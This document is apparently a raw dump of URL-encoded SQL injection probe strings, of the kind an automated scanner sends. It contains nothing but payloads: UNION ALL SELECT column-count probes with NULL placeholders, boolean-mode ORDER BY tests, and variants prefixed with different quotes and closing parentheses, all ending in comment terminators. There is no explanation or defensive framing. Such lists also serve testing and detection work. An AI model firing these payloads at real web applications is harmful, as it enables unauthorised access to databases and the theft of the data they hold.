-8045%27%2B%28SELECT%20%27MzMe%27%20WHERE%206420%3D6420%20UNION%20ALL%20SELECT%206420%2C6420%2C6420%2C6420%2C6420%23 -8346%27%2B%28SELECT%20%27kBpr%27%20WHERE%202555%3D2555%20UNION%20ALL%20SELECT%202555%2C2555%2C2555%2C2555%2C2555%2C2555%23 -2203%27%2B%28SELECT%20%27zckN%27%20WHERE%208777%3D8777%20UNION%20ALL%20SELECT%208777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%23 -5629%27%2B%28SELECT%20%27oSRr%27%20WHERE%202770%3D2770%20UNION%20ALL%20SELECT%202770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%23 -4280%27%2B%28SELECT%20%27VCzA%27%20WHERE%202938%3D2938%20UNION%20ALL%20SELECT%202938%2C2938%2C2938%2C2938%2C2938%2C2938%2C2938%2C2938%2C2938%23 -6483%27%2B%28SELECT%20%27XhGd%27%20WHERE%208587%3D8587%20UNION%20ALL%20SELECT%208587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%23 -6412%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%23 -4208%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%208860%23 -4599%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203984%23 -5655%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209845%2C9845%23 -7292%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203804%2C3804%2C3804%23 -3773%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206364%2C6364%2C6364%2C6364%23 -5842%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202286%2C2286%2C2286%2C2286%2C2286%23 -6090%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203716%2C3716%2C3716%2C3716%2C3716%2C3716%23 -7073%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209024%2C9024%2C9024%2C9024%2C9024%2C9024%2C9024%23 -3360%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%23 -9392%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%23 -4374%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 